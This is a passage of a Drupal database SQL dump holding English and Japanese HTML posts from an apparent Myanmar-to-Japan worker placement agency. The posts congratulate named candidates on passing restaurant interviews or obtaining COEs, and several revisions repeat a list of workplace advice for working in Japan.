('activities', 0, 84, 465, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したYE MONG AUNGさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 85, 462, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p><strong>Congratulations PAING MYO ZAW for passing the Interview &nbsp;Tokutei Gaishoku (Restaurant) !&nbsp;</strong></p><p>&nbsp;</p><img data-entity-uuid=\"2fb8cff3-5648-4379-8a1a-e205eb8c7dcb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PAING%20MYO%20ZAW.jpg\">', '', 'full_html'),
('activities', 0, 85, 463, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p><strong>Congratulations PAING MYO ZAW for passing the Interview &nbsp;Tokutei Gaishoku (Restaurant) !&nbsp;</strong></p><p>&nbsp;</p><img data-entity-uuid=\"2fb8cff3-5648-4379-8a1a-e205eb8c7dcb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/PAING%20MYO%20ZAW.jpg\">', '', 'full_html'),
('activities', 0, 85, 463, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>PAING MYO ZAWさん、特定外食面接合格おめでとうございます！</strong></p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/PAING%20MYO%20ZAW.jpg\" data-entity-uuid=\"2fb8cff3-5648-4379-8a1a-e205eb8c7dcb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 86, 466, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations LA PYAE AUNG For Getting COE&nbsp;</p>', '', 'full_html'),
('activities', 0, 86, 467, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations LA PYAE AUNG For Getting COE&nbsp;</p>', '', 'full_html'),
('activities', 0, 86, 467, 'ja', 0, '<blockquote><pre class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwjXt6L-yvaGAxX_TGwGHbTxDOsQ3ewLegQIBRAU\" dir=\"ltr\"><span class=\"Y2IQFc\" lang=\"ja\">おめでとう!</span></pre></blockquote><p class=\"tw-data-text tw-text-large tw-ta\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(248, 249, 250);border:none;color:rgb(32, 33, 36);font-family:inherit;font-size:28px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;line-height:32px;margin:-2px 0px;orphans:2;overflow-wrap:break-word;overflow:hidden;padding:2px 0.14em 2px 0px;position:relative;resize:none;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;unicode-bidi:isolate;white-space:pre-wrap;widows:2;width:270px;word-spacing:0px;\" data-placeholder=\"Translation\" id=\"tw-target-text\" aria-label=\"Translated text\" data-ved=\"2ahUKEwjXt6L-yvaGAxX_TGwGHbTxDOsQ3ewLegQIBRAU\" dir=\"ltr\">LA PYAE AUNG さん、COE 取得おめでとうございます</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 87, 468, 'ja', 0, '<blockquote><p>Things to Remember when you come to Japan to work</p></blockquote><ol><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Strictly respect working hours.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Maintain morals in work,</span><span class=\"HwtZe\" jsaction=\"mouseup:Sxi9L,BR6jm; mousedown:qjlr0e\" jsname=\"jqKxS\" lang=\"en\"> </span><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">No matter what kind of work you choose, try to work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Learn to understand Japanese work/culture.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Respect seniors at work.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Listen carefully to the adults at work and work carefully and neatly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">At the workplace, dress neatly and behave smartly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Continuously learn and improve Japanese language/speaking Japanese.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get into the habit of going to bed early/get enough sleep and get ready for work in the morning.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Reduce using Facebook at night completely.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get rid of the (careless) ideas of \"that\'s enough\" and replace them with clear and precise ideas of \"I will do my best carefully and thoroughly\".</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Treat any business as if it were your own work and work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">To work hard for Myanmar, learn the dignity of good manners, and make good sons and daughters who are proud of their parents. Let them show.</span></li></ol>', '', 'full_html'),
('activities', 0, 87, 469, 'en', 0, '<blockquote><p>Things to Remember when you come to Japan to work</p></blockquote><ol><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Strictly respect working hours.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Maintain morals in work,</span><span class=\"HwtZe\" jsaction=\"mouseup:Sxi9L,BR6jm; mousedown:qjlr0e\" jsname=\"jqKxS\" lang=\"en\"> </span><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">No matter what kind of work you choose, try to work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Learn to understand Japanese work/culture.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Respect seniors at work.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Listen carefully to the adults at work and work carefully and neatly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">At the workplace, dress neatly and behave smartly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Continuously learn and improve Japanese language/speaking Japanese.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get into the habit of going to bed early/get enough sleep and get ready for work in the morning.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Reduce using Facebook at night completely.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get rid of the (careless) ideas of \"that\'s enough\" and replace them with clear and precise ideas of \"I will do my best carefully and thoroughly\".</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Treat any business as if it were your own work and work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">To work hard for Myanmar, learn the dignity of good manners, and make good sons and daughters who are proud of their parents. Let them show.</span></li></ol>', '', 'full_html'),
('activities', 0, 87, 469, 'ja', 0, '<blockquote><p>Things to Remember when you come to Japan to work</p></blockquote><ol><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Strictly respect working hours.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Maintain morals in work,</span><span class=\"HwtZe\" jsaction=\"mouseup:Sxi9L,BR6jm; mousedown:qjlr0e\" jsname=\"jqKxS\" lang=\"en\"> </span><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">No matter what kind of work you choose, try to work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Learn to understand Japanese work/culture.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Respect seniors at work.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Listen carefully to the adults at work and work carefully and neatly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">At the workplace, dress neatly and behave smartly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Continuously learn and improve Japanese language/speaking Japanese.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get into the habit of going to bed early/get enough sleep and get ready for work in the morning.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Reduce using Facebook at night completely.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get rid of the (careless) ideas of \"that\'s enough\" and replace them with clear and precise ideas of \"I will do my best carefully and thoroughly\".</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Treat any business as if it were your own work and work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">To work hard for Myanmar, learn the dignity of good manners, and make good sons and daughters who are proud of their parents. Let them show.</span></li></ol>', '', 'full_html'),
('activities', 0, 87, 476, 'en', 0, '<blockquote><p>Things to Remember when you come to Japan to work</p></blockquote><ol><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Strictly respect working hours.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Maintain morals in work,</span><span class=\"HwtZe\" jsaction=\"mouseup:Sxi9L,BR6jm; mousedown:qjlr0e\" jsname=\"jqKxS\" lang=\"en\"> </span><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">No matter what kind of work you choose, try to work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Learn to understand Japanese work/culture.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Respect seniors at work.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Listen carefully to the adults at work and work carefully and neatly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">At the workplace, dress neatly and behave smartly.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Continuously learn and improve Japanese language/speaking Japanese.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get into the habit of going to bed early/get enough sleep and get ready for work in the morning.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Reduce using Facebook at night completely.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Get rid of the (careless) ideas of \"that\'s enough\" and replace them with clear and precise ideas of \"I will do my best carefully and thoroughly\".</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">Treat any business as if it were your own work and work hard.</span></li><li><span class=\"HwtZe jCAhz JxVs2d ChMk0b ryNqvb\" jsaction=\"click:Z0znGe,GFf3ac,fbWStc;contextmenu:Nqw7Te,QP7LD; mouseout:Nqw7Te; mouseover:Z0znGe,c2aHje\" jsname=\"W297wb\" lang=\"en\" jscontroller=\"BiTO4b\">To work hard for Myanmar, learn the dignity of good manners, and make good sons and daughters who are proud of their parents. Let them show.</span></li></ol>', '', 'full_html'),
('activities', 0, 87, 476, 'ja', 0, '<blockquote><h3>日本に仕事で来るときに覚えておくべきこと</h3></blockquote><ol><li>労働時間を厳守してください。</li><li>仕事において道徳心を持ち、どんな仕事を選ぶにしても一生懸命働くように努めてください。</li><li>日本の仕事や文化を理解する。</li><li>職場では先輩を尊敬しましょう。</li><li>職場の大人の言うことをよく聞いて、丁寧にきれいに仕事をしましょう。</li><li>職場ではきちんとした服装をし、スマートな振る舞いをしましょう。</li><li>継続的に日本語を学び、日本語の会話力を向上させます。</li><li>早めに寝る習慣をつけ、十分な睡眠をとり、朝の仕事に備えましょう。</li><li>夜間の Facebook の使用を完全に減らしましょう。</li><li>「もう十分だ」という（不注意な）考えを捨て、「慎重に徹底的に最善を尽くす」という明確で正確な考えに置き換えてください。</li><li>いかなるビジネスも自分の仕事であるかのように扱い、一生懸命働きましょう。</li><li>ミャンマーのために一生懸命働き、礼儀正しさの尊厳を学び、親を誇りに思うような良い息子、娘を育てましょう。それを示しましょう。</li></ol>', '', 'full_html'),
('activities', 0, 88, 470, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations NILAR AUNG &amp; TIN ZAR WIN MYINT For Getting COE<img src=\"/sites/default/files/inline-images/Nila%20Aung.jpg\" data-entity-uuid=\"372f4e87-6e97-42d0-b5d3-fe9fd367eaed\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Tin%20Zar%20Win%20Myinnt.jpg\" data-entity-uuid=\"7c3d4292-72a4-4fc9-b99b-9c3e67f4fd05\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 88, 471, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations NILAR AUNG &amp; TIN ZAR WIN MYINT For Getting COE<img src=\"/sites/default/files/inline-images/Nila%20Aung.jpg\" data-entity-uuid=\"372f4e87-6e97-42d0-b5d3-fe9fd367eaed\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Tin%20Zar%20Win%20Myinnt.jpg\" data-entity-uuid=\"7c3d4292-72a4-4fc9-b99b-9c3e67f4fd05\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 88, 471, 'ja', 0, '<blockquote><p>おめでとう！</p></blockquote><p>NILAR AUNG さんと TIN ZAR さん、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/Nila%20Aung.jpg\" data-entity-uuid=\"372f4e87-6e97-42d0-b5d3-fe9fd367eaed\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Tin%20Zar%20Win%20Myinnt.jpg\" data-entity-uuid=\"7c3d4292-72a4-4fc9-b99b-9c3e67f4fd05\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 89, 472, 'en', 0, '<blockquote><h2><img src=\"/sites/default/files/inline-images/Pyae%20Son%20Aung.jpg\" data-entity-uuid=\"6db3ad63-a91f-47e1-8518-40600fc3fdf6\" data-entity-type=\"file\">Congratulations!</h2></blockquote><p>Congratulations THANDAR MOE &amp; PYAE SONE AUNG For Getting COE</p>', '', 'full_html'),
('activities', 0, 89, 473, 'en', 0, '<blockquote><h2><img src=\"/sites/default/files/inline-images/Pyae%20Son%20Aung.jpg\" data-entity-uuid=\"6db3ad63-a91f-47e1-8518-40600fc3fdf6\" data-entity-type=\"file\">Congratulations!</h2></blockquote><p>Congratulations THANDAR MOE &amp; PYAE SONE AUNG For Getting COE</p>', '', 'full_html'),
('activities', 0, 89, 473, 'ja', 0, '<blockquote><h2><img src=\"/sites/default/files/inline-images/Pyae%20Son%20Aung.jpg\" data-entity-uuid=\"6db3ad63-a91f-47e1-8518-40600fc3fdf6\" data-entity-type=\"file\"> おめでとう！</h2><p>THANDAR MOE さんと PYAE SONE AUNG さん、COE 取得おめでとうございます</p></blockquote>', '', 'full_html'),
('activities', 0, 90, 474, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to Chaw Chit Kyaw in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 90, 475, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to CHAW KYIT KYAW in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 90, 477, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to CHAW KYIT KYAW in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 90, 477, 'ja', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>特定外食（レストラン）の面接に合格したCHAW KYIT KYAWさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 90, 478, 'en', 0, '<blockquote><h2>Congratulations!!</h2></blockquote><p>Congratulations to CHAW KYIT KYAW in passing the interview for Tokutei Gaishoku (Restaurant)!</p>', '', 'full_html'),
('activities', 0, 90, 478, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>特定外食（レストラン）の面接に合格したCHAW KYIT KYAWさん、おめでとうございます！</p>', '', 'full_html'),
('activities', 0, 91, 479, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations HNIN EI PHYU &amp; EI SHWE ZIN &amp; AUNG ZIN OO For Getting COE<img src=\"/sites/default/files/inline-images/AUNG%20ZIN%20KO.jpg\" data-entity-uuid=\"1f473f5c-0d06-4380-98e1-af1f06d81b3e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Ei%20Shwe%20Zin.jpg\" data-entity-uuid=\"35704e3e-a6dc-466f-afc3-e9f68aff58cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Hnin%20Pwint%20Phyu.jpg\" data-entity-uuid=\"34af725f-866d-4124-ad46-625b9369b571\" data-entity-type=\"file\"></p>', '', 'full_html'),
